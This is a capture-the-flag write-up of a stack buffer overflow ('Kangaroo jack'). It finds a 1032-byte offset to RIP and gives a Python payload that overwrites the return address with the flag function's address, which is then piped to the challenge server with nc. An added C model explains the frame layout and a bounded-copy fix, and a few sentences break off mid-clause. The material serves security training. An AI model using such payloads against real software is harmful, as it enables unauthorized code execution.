Kangaroo jack is a simple buffer overflow challenge. We start by opening up the program in radare2.
Here we can see that there is a function named flag. I take a guess that we need to jump to this function, and then the flag will be printed.
I take a look into main to see how large the buffer is; it seems it's
Once I know the rough offset, I open the program in gdb with the peda toolkit and use the function to generate a text string that can be used to determine which length offset overflows into the RIP register. After a bit of fiddling I found that the buffer length that overflows into RIP is 1032 (this took some time, since going over 1038 bytes of buffer length would cause a segfault before rdi took a value).
Now we can construct an exploit string to jump to

    from struct import pack

    # 1032 bytes of filler reach the saved return address, then the
    # little-endian 64-bit address of the target function follows.
    buf = b""
    buf += b"A" * 1032
    buf += pack("<Q", 0x400676)

    with open("overflow.txt", "wb") as f:
        f.write(buf)
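As an added illustration of why a 1032-byte write reaches the return address, and not code from the original write-up: the C model below lays out a stack frame the way the overflow implies it (a buffer assumed to be 1024 bytes, followed by the 8-byte saved RBP and then the return address), and contrasts an unbounded copy, which lets a payload of the shape used above change the return slot, with a bounded copy that cannot. The 1024-byte buffer size, the constructed original return address 0x401000 and all function names are assumptions, not values from the challenge binary.

```c
/* Model of the stack frame the write-up's offset implies.  The buffer size
 * (1024) is an assumption: 1024 data bytes + 8 bytes of saved RBP = 1032,
 * which matches the offset at which the write-up found RIP being overwritten. */
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUF_SIZE 1024

struct frame {
    uint8_t  buf[BUF_SIZE];   /* local buffer, lowest address              */
    uint64_t saved_rbp;       /* caller's frame pointer, pushed by prologue */
    uint64_t ret_addr;        /* return address, what `ret` pops into RIP   */
};

/* Offset from the start of the buffer to the return address slot.
 * With a 1024-byte buffer this is 1032, the value found in the write-up. */
size_t return_address_offset(void) {
    return offsetof(struct frame, ret_addr);
}

/* Vulnerable copy: the input length is never checked against the buffer, so
 * bytes past BUF_SIZE spill into saved_rbp and then ret_addr.  The frame is
 * written as one byte array here to model the contiguous stack. */
void copy_unbounded(struct frame *f, const uint8_t *in, size_t len) {
    if (len > sizeof *f) len = sizeof *f;  /* keep the model itself in bounds */
    memcpy((uint8_t *)f, in, len);
}

/* Hardened copy: at most BUF_SIZE - 1 bytes are copied and the buffer is
 * NUL-terminated, so no input length can reach saved_rbp or ret_addr.
 * Returns 1 if the input was truncated, 0 otherwise. */
int copy_bounded(struct frame *f, const uint8_t *in, size_t len) {
    size_t n = len < BUF_SIZE - 1 ? len : BUF_SIZE - 1;
    memcpy(f->buf, in, n);
    f->buf[n] = '\0';
    return len > n;
}

/* Builds the same payload shape as the write-up's script: `pad` filler bytes
 * followed by a little-endian 64-bit target address.  Returns the total
 * length, or 0 if it would not fit in `out`. */
size_t build_payload(uint8_t *out, size_t cap, size_t pad, uint64_t target) {
    if (pad + 8 > cap) return 0;
    memset(out, 'A', pad);
    for (int i = 0; i < 8; i++) out[pad + i] = (uint8_t)(target >> (8 * i));
    return pad + 8;
}

/* Runs one payload through both copies and reports which one changed the
 * return address slot: bit 0 set if copy_unbounded did, bit 1 if copy_bounded did. */
int ret_addr_overwritten(size_t pad, uint64_t target) {
    uint8_t payload[sizeof(struct frame)];
    size_t len = build_payload(payload, sizeof payload, pad, target);
    const uint64_t original = 0x401000;  /* constructed original return address */
    struct frame f;
    int result = 0;

    memset(&f, 0, sizeof f);
    f.ret_addr = original;
    copy_unbounded(&f, payload, len);
    if (f.ret_addr != original) result |= 1;

    memset(&f, 0, sizeof f);
    f.ret_addr = original;
    copy_bounded(&f, payload, len);
    if (f.ret_addr != original) result |= 2;

    return result;
}

int main(void) {
    /* 1032 bytes of padding lands the target in ret_addr; 1024 only reaches saved_rbp. */
    assert(return_address_offset() == 1032);
    assert(ret_addr_overwritten(1032, 0x400676) == 1);
    assert(ret_addr_overwritten(1024, 0x400676) == 0);
    return 0;
}
```

The difference between the two copies is the whole mitigation: once the copy length is tied to the buffer's declared size, the saved RBP and return slots stay untouched no matter how long the input is, which is the property a stack canary or a bounded read would give the real program.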
And then send it to the online challenge:
    λ cat overflow.txt | nc dolphin.hacking-lab.com 4422
    Give me some input and jump!!
Unfortunately this challenge is buggy and sometimes locks up, not giving you the flag.